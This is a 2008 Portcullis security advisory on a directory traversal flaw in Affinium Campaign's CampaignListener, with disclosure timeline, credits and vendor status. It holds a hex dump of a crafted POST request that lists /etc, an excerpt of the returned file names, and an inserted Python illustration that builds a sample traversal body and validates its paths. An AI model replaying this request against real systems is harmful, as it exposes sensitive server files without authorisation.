Security Advisory 08-006 – Affinium Campaign’s Listener is vulnerable to directory traversal

Vulnerability Title:

The Listener is vulnerable to directory traversal.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

It is possible for an attacker to traverse the directory structure and break out of the application-imposed sandbox by manipulating requests from the web application’s ActiveX control, which encapsulates binary data within an HTTP POST request to https://webserver/Campaign/CampaignListener. Since the CampaignListener web page expects binary data, no attempt is made to validate the input before it is passed to the listener server. For example:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 31 20 48 54 54 50 2f |ClientID=1 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 55 6e |rver..Cookie: Un|
00000050 69 63 61 44 65 66 61 75 6c 74 43 61 74 61 6c 6f |icaDefaultCatalo|
00000060 67 3d 44 52 5f 54 65 73 74 2e 63 61 74 3b 20 43 |g=DR_Test.cat; C|
00000070 41 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 |AMPAIGNSESSIONID|
00000080 3d 48 41 5a 51 74 36 50 6c 6b 56 38 34 4c 62 32 |=HAZQt6PlkV84Lb2|
00000090 70 46 53 37 58 77 4d 6d 62 4c 41 31 76 4d 6e 74 |pFS7XwMmbLA1vMnt|
000000a0 6e 50 38 6d 4c 47 41 68 31 47 79 59 43 76 30 6e |nP8mLGAh1GyYCv0n|
000000b0 44 37 79 6b 34 21 37 30 37 36 33 30 32 33 39 0d |D7yk4!707630239.|
000000c0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000d0 20 32 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 229..Content-Ty|
000000e0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000f0 72 6d 2d 64 61 74 61 0d 0a 0d 0a e1 00 00 00 01 |rm-data....á....|
00000100 00 02 07 08 00 00 00 01 01 00 00 00 12 00 00 00 |................|
00000110 0d 01 00 00 00 00 01 01 00 00 00 01 00 00 00 01 |................|
00000120 01 00 00 00 17 00 00 00 12 09 00 00 00 53 46 69 |.............SFi|
00000130 6c 65 53 79 73 00 01 01 00 00 00 01 00 00 00 04 |leSys...........|
00000140 97 00 00 00 00 00 00 00 42 00 00 00 00 00 46 00 |........B.....F.|
00000150 00 00 2f 65 74 63 00 00 00 00 00 00 00 00 00 00 |../etc..........|
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000190 00 00 00 00 00 00 00 00 00 3c 00 00 00 2f 61 70 |.........<.../ap|
000001a0 70 73 2f 75 6e 69 63 61 2f 61 66 66 69 6e 69 75 |ps/unica/affiniu|
000001b0 6d 2f 41 66 66 69 6e 69 75 6d 2f 43 61 6d 70 61 |m/Affinium/Campa|
000001c0 69 67 6e 2f 70 61 72 74 69 74 69 6f 6e 73 2f 70 |ign/partitions/p|
000001d0 61 72 74 69 74 69 6f 6e 31 00 42 00 00 00 00 00 |artition1.B.....|
000001e0 0d 0a |..|

This results in the following being returned:

… snipped for brevity …

00001200 00 00 01 00 00 00 41 41 06 00 00 00 70 61 73 73 |......AA....pass|
00001210 77 64 00 fb 66 60 c9 14 09 00 00 00 00 00 00 01 |wd.ûf`É.........|
00001220 00 00 00 41 41 04 00 00 00 70 69 6e 67 00 d7 8c |...AA....ping.×.|
00001230 92 c5 82 7d 00 00 00 00 00 00 01 00 00 00 41 41 |.Å.}..........AA|
00001240 0c 00 00 00 70 6f 6c 69 63 79 64 2e 63 6f 6e 66 |....policyd.conf|
00001250 00 8a 46 3a c5 b0 08 00 00 00 00 00 00 01 00 00 |..F:Å°..........|
00001260 00 41 41 0d 00 00 00 70 72 65 73 65 72 76 65 2e |.AA....preserve.|
00001270 6c 69 73 74 00 6f 47 3a c5 c4 04 00 00 00 00 00 |list.oG:ÅÄ......|
00001280 00 01 00 00 00 41 41 07 00 00 00 70 72 6f 66 69 |.....AA....profi|
00001290 6c 65 00 45 c7 d8 c5 d8 0f 00 00 00 00 00 00 01 |le.EÇØÅØ........|
000012a0 00 00 00 41 41 0b 00 00 00 70 72 6f 66 69 6c 65 |...AA....profile|
000012b0 2e 61 77 73 00 6f 6c c4 c5 58 02 00 00 00 00 00 |.aws.olÄÅX......|
000012c0 00 01 00 00 00 41 41 0d 00 00 00 70 72 6f 66 69 |.....AA....profi|
000012d0 6c 65 2e 62 61 6b 75 70 00 0b 6f 44 c5 7f 09 00 |le.bakup..oDÅ...|
000012e0 00 00 00 00 00 01 00 00 00 41 41 0b 00 00 00 70 |.........AA....p|
000012f0 72 6f 66 69 6c 65 2e 75 6e 69 00 5a 71 c4 c5 be |rofile.uni.ZqÄž|
00001300 01 00 00 00 00 00 00 01 00 00 00 41 41 09 00 00 |...........AA...|
00001310 00 70 72 6f 74 6f 63 6f 6c 73 00 8a 46 3a c5 ba |.protocols..F:ź|
00001320 26 00 00 00 00 00 00 01 00 00 00 41 41 08 00 00 |&..........AA...|
00001330 00 70 73 65 2e 63 6f 6e 66 00 df 44 3a c5 fc 0c |.pse.conf.ßD:Åü.|
00001340 00 00 00 00 00 00 01 00 00 00 41 41 0d 00 00 00 |..........AA....|
00001350 70 73 65 5f 74 75 6e 65 2e 63 6f 6e 66 00 df 44 |pse_tune.conf.ßD|

… snipped for brevity …
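As an added illustration, not part of the advisory or of the vendor's code, the following shows the kind of server-side check the CampaignListener front-end does not perform: it pulls the path fields out of a request body modelled on the dump above and rejects any that resolve outside the partition root. The partition path is taken from the dump; the 4-byte little-endian length-prefix framing of each string is an assumption inferred from the dump, not a documented Unica format.

```python
import posixpath
import struct

# Partition root seen in the advisory's request dump.
PARTITION_ROOT = "/apps/unica/affinium/Affinium/Campaign/partitions/partition1"

def lp_string(s, pad_to=0):
    """Encode s as a 4-byte little-endian length followed by a NUL-terminated
    string, zero-padded to pad_to bytes (framing inferred from the dump; assumption)."""
    raw = (s.encode() + b"\x00").ljust(pad_to, b"\x00")
    return struct.pack("<I", len(raw)) + raw

def build_sample():
    """Constructed body: the SFileSys command, the requested directory /etc
    (70-byte field, as at offset 0x14e in the dump) and the partition root."""
    return lp_string("SFileSys") + lp_string("/etc", 70) + lp_string(PARTITION_ROOT)

def extract_paths(body):
    """Return every length-prefixed field that looks like a path; bytes that
    do not frame a plausible field are skipped one at a time."""
    paths, i = [], 0
    while i + 4 <= len(body):
        n = struct.unpack_from("<I", body, i)[0]
        field = body[i + 4:i + 4 + n]
        if 0 < n <= 1024 and len(field) == n and field[:1] in (b"/", b"."):
            paths.append(field.split(b"\x00", 1)[0].decode("latin-1"))
            i += 4 + n
        else:
            i += 1
    return paths

def within_root(path, root=PARTITION_ROOT):
    """True only if the path, after normalisation, stays under the partition root."""
    candidate = path if posixpath.isabs(path) else posixpath.join(root, path)
    resolved = posixpath.normpath(candidate)
    return resolved == root or resolved.startswith(root + "/")

def check_request(body):
    """Pair each path field with the verdict a validating front-end should apply."""
    return [(p, within_root(p)) for p in extract_paths(body)]

if __name__ == "__main__":
    for path, ok in check_request(build_sample()):
        print(("allow " if ok else "REJECT") + " " + path)
```

Run against the constructed body, the absolute /etc field is rejected while the partition root itself is allowed.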

Impact:

An attacker would be able to use this to list files in sensitive locations. Whilst it was not conclusively proven, it may also be possible to map existing files such as /etc/passwd to Affinium Campaign tables and execute arbitrary commands by further manipulation of requests from the ActiveX control to the CampaignListener web page.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.